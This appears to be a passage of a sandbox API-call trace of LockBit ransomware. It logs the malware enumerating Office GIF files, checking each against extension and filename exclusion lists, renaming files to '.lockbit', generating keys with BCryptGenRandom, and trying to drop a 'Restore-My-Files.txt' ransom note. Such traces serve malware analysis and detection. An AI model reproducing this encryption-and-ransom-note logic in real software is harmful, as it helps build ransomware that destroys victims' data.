lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.991] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.991] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.991] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.991] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.991] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.991] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.991] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.991] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.991] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.991] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.991] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.992] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.992] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.992] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.992] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.992] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.992] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.992] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.992] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.992] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.992] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.992] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115842.GIF.lockbit") returned 78 [0204.992] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115842.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115842.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.994] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.994] malloc (_Size=0x40068) returned 0x3df0008 [0204.994] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=176) returned 1 [0204.994] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.995] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.995] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.995] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.996] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.996] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.996] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0205.000] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115842.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115842.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.000] malloc (_Size=0xb2) returned 0x1fa2ed8 [0205.000] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0205.000] free (_Block=0x1fa2ed8) [0205.000] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115842.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0205.000] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0205.000] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0205.000] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aace000, ftCreationTime.dwHighDateTime=0x1bd9367, ftLastAccessTime.dwLowDateTime=0xbd408600, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4aace000, ftLastWriteTime.dwHighDateTime=0x1bd9367, nFileSizeHigh=0x0, nFileSizeLow=0xb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0115843.GIF", cAlternateFileName="")) returned 1 [0205.000] lstrcmpiW (lpString1=".", lpString2="J0115843.GIF") returned -1 [0205.000] lstrcmpiW (lpString1="..", lpString2="J0115843.GIF") returned -1 [0205.000] PathFindExtensionW (pszPath="J0115843.GIF") returned=".GIF" [0205.000] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0205.000] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0205.000] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0205.000] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0205.001] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0205.001] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0205.001] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0205.001] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0205.001] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0205.001] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0205.001] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0205.001] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0205.001] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0205.001] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0205.001] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0205.001] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0205.001] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0205.001] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0205.001] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0205.001] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0205.001] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0205.001] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0205.001] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0205.001] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0205.001] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.001] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0205.001] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0205.001] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0205.001] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0205.001] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0205.001] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0205.001] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0205.002] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0205.002] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0205.002] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0205.002] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0205.002] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0205.002] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0205.002] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0205.002] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0205.002] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0205.002] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0205.002] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.002] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0205.002] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0205.002] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0205.002] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0205.002] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0115843.GIF") returned 1 [0205.002] lstrcmpiW (lpString1="ntldr", lpString2="J0115843.GIF") returned 1 [0205.002] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0115843.GIF") returned 1 [0205.002] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0115843.GIF") returned -1 [0205.002] lstrcmpiW (lpString1="autorun.inf", lpString2="J0115843.GIF") returned -1 [0205.002] lstrcmpiW (lpString1="thumbs.db", lpString2="J0115843.GIF") returned 1 [0205.002] lstrcmpiW (lpString1="iconcache.db", lpString2="J0115843.GIF") returned -1 [0205.002] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0205.002] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115843.GIF") returned=".GIF" [0205.002] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0205.002] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0205.002] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0205.003] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0205.003] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0205.003] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0205.003] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0205.003] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0205.003] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0205.003] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0205.003] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0205.003] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0205.003] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0205.003] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0205.003] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0205.003] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0205.003] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0205.003] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0205.003] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0205.003] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0205.003] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0205.003] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0205.003] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0205.003] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0205.003] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0205.003] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0205.003] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0205.003] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0205.003] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115843.GIF.lockbit") returned 78 [0205.003] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115843.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115843.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0205.005] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0205.005] malloc (_Size=0x40068) returned 0x3df0008 [0205.005] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=176) returned 1 [0205.005] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.006] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.006] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0205.006] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.007] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.007] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0205.007] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0205.011] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115843.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115843.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.011] malloc (_Size=0xb2) returned 0x1fa2ed8 [0205.011] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0205.011] free (_Block=0x1fa2ed8) [0205.011] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115843.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0205.011] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0205.011] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0205.011] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bde0d00, ftCreationTime.dwHighDateTime=0x1bd9367, ftLastAccessTime.dwLowDateTime=0xbd408600, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4bde0d00, ftLastWriteTime.dwHighDateTime=0x1bd9367, nFileSizeHigh=0x0, nFileSizeLow=0xb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0115844.GIF", cAlternateFileName="")) returned 1 [0205.011] lstrcmpiW (lpString1=".", lpString2="J0115844.GIF") returned -1 [0205.011] lstrcmpiW (lpString1="..", lpString2="J0115844.GIF") returned -1 [0205.011] PathFindExtensionW (pszPath="J0115844.GIF") returned=".GIF" [0205.012] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0205.012] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0205.012] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0205.012] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0205.012] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0205.012] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0205.012] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0205.012] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0205.012] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0205.012] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0205.012] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0205.012] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0205.012] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0205.012] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0205.012] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0205.012] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0205.012] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0205.012] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0205.012] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0205.012] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0205.012] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0205.012] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0205.012] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0205.012] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0205.012] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.012] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0205.012] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0205.012] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0205.013] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0205.013] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0205.013] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0205.013] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0205.013] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0205.013] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0205.013] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0205.013] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0205.013] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0205.013] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0205.013] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0205.013] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0205.013] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0205.013] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0205.013] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.013] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0205.013] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0205.013] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0205.013] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0205.013] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0115844.GIF") returned 1 [0205.013] lstrcmpiW (lpString1="ntldr", lpString2="J0115844.GIF") returned 1 [0205.013] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0115844.GIF") returned 1 [0205.013] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0115844.GIF") returned -1 [0205.013] lstrcmpiW (lpString1="autorun.inf", lpString2="J0115844.GIF") returned -1 [0205.013] lstrcmpiW (lpString1="thumbs.db", lpString2="J0115844.GIF") returned 1 [0205.013] lstrcmpiW (lpString1="iconcache.db", lpString2="J0115844.GIF") returned -1 [0205.013] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0205.013] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115844.GIF") returned=".GIF" [0205.014] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0205.014] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0205.014] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0205.014] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0205.014] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0205.014] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0205.014] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0205.014] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0205.014] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0205.014] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0205.014] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0205.014] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0205.014] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0205.014] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0205.014] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0205.014] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0205.014] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0205.014] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0205.014] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0205.014] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0205.014] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0205.014] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0205.014] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0205.014] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0205.014] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0205.014] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0205.014] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0205.014] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0205.015] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115844.GIF.lockbit") returned 78 [0205.015] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115844.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115844.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0205.016] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0205.016] malloc (_Size=0x40068) returned 0x3df0008 [0205.016] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=176) returned 1 [0205.016] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.017] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.017] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0205.017] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.017] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.017] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0205.017] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0205.022] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115844.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115844.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.022] malloc (_Size=0xb2) returned 0x1fa2ed8 [0205.022] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0205.022] free (_Block=0x1fa2ed8) [0205.022] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115844.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0205.022] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0205.022] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0205.022] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57c9cf00, ftCreationTime.dwHighDateTime=0x1bd9367, ftLastAccessTime.dwLowDateTime=0xbd42e760, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x57c9cf00, ftLastWriteTime.dwHighDateTime=0x1bd9367, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0115863.GIF", cAlternateFileName="")) returned 1 [0205.022] lstrcmpiW (lpString1=".", lpString2="J0115863.GIF") returned -1 [0205.022] lstrcmpiW (lpString1="..", lpString2="J0115863.GIF") returned -1 [0205.022] PathFindExtensionW (pszPath="J0115863.GIF") returned=".GIF" [0205.022] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0205.022] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0205.022] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0205.023] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0205.023] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0205.023] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0205.023] lstrcmpiW (lpString1=".msi", lpString2=".GIF") 